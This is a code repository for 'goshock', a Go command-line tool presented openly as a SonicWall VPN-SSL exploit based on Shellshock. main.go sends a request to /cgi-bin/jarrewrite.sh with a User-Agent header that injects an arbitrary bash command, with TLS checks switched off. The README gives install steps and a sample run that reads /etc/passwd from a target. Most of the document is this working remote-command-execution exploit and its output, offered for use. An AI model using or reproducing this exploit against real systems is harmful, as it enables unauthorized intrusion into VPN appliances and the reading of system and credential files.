├── README.md
├── goshock.png
└── main.go


/README.md:
--------------------------------------------------------------------------------
 1 | # goshock
 2 | SonicWall VPN-SSL Exploit* using Golang ( * and other targets vulnerable to shellshock ).
 3 | 
 4 | # Install
 5 | ```
 6 | ▶ go get -u -v github.com/gustavorobertux/goshock
 7 | ```
 8 | # Basic Usage
 9 | ```
10 | ▶ goshock
11 | 
12 | TARGET> x.x.x.x
13 | Linux Shell Command> cat /etc/passwd
14 | 
15 | root:x:0:0:root:/root:/usr/sbin/cli
16 | bin:x:1:1:bin:/bin:/bin/false
17 | daemon:x:2:2:daemon:/sbin:/bin/false
18 | mail:x:8:12:mail:/var/spool/mail:/bin/false
19 | squid:x:23:23:ftp:/var/spool/squid:/bin/false
20 | ntp:x:38:38::/etc/ntp:/bin/false
21 | sshd:x:74:74:sshd:/var/empty:/bin/false
22 | nobody:x:99:99:Nobody:/home/nobody:/bin/false
23 | snort:x:100:101:ftp:/var/log/snort:/bin/false
24 | logwatch:x:102:102::/var/log/logwatch:/bin/false
25 | dnsmasq:x:103:103::/:/bin/false
26 | cron:x:104:104::/:/bin/false
27 | admin::105:105::/:/usr/sbin/cli
28 | ```
29 | # Screenshot
30 | <p align="center"><img src="https://github.com/gustavorobertux/goshock/blob/main/goshock.png" width="40%"></p>
31 | 


--------------------------------------------------------------------------------
/goshock.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gustavorobertux/goshock/a8a59055fc9357845f29e1cde487a17cfc97a3e1/goshock.png


--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import (
 4 | 	"crypto/tls"
 5 | 	"fmt"
 6 | 	"io/ioutil"
 7 | 	"log"
 8 | 	"net/http"
 9 | 
10 | 	"github.com/gookit/color"
11 | )
12 | 
13 | func showBanner() {
14 | 
15 | 	banner := `  
16 | 	 _                   
17 | 	|_) \/ |   _. |_   _ 
18 | 	|   /\ |_ (_| |_) _>
19 | 	
20 | 	  GoShock v.0.0.1
21 | `
22 | 
23 | 	fmt.Println(banner)
24 | 
25 | }
26 | 
27 | func main() {
28 | 	// clear screen
29 | 	fmt.Print("\033[H\033[2J")
30 | 
31 | 	showBanner()
32 | 
33 | 	var TARGET string
34 | 	var CMD string
35 | 	var ARG string
36 | 
37 | 	color.Bold.Print("TARGET> ")
38 | 	fmt.Scan(&TARGET)
39 | 
40 | 	color.Bold.Print("Linux Shell Command> ")
41 | 	fmt.Scan(&CMD)
42 | 	fmt.Scanln(&ARG)
43 | 
44 | 	COMMAND := fmt.Sprintf("%s %s", CMD, ARG)
45 | 
46 | 	tr := &http.Transport{
47 | 		TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
48 | 	}
49 | 	client := &http.Client{Transport: tr}
50 | 
51 | 	req, err := http.NewRequest("GET", "https://"+TARGET+"/cgi-bin/jarrewrite.sh", nil)
52 | 	if err != nil {
53 | 
54 | 	}
55 | 	req.Host = TARGET
56 | 	req.Header.Set("User-Agent", "() { :; }; echo ; /bin/bash -c '"+COMMAND+"'")
57 | 	req.Header.Set("Connection", "close")
58 | 	req.Header.Set("Accept", "*/*")
59 | 	req.Header.Set("Accept-Language", "en")
60 | 	req.Header.Set("Accept-Encoding", "gzip, deflate")
61 | 
62 | 	resp, err := client.Do(req)
63 | 	if err != nil {
64 | 		log.Fatalln(err)
65 | 	}
66 | 
67 | 	defer resp.Body.Close()
68 | 
69 | 	body, err := ioutil.ReadAll(resp.Body)
70 | 	if err != nil {
71 | 		log.Fatalln(err)
72 | 	}
73 | 	fmt.Printf("%s\n", body)
74 | }
75 | 


--------------------------------------------------------------------------------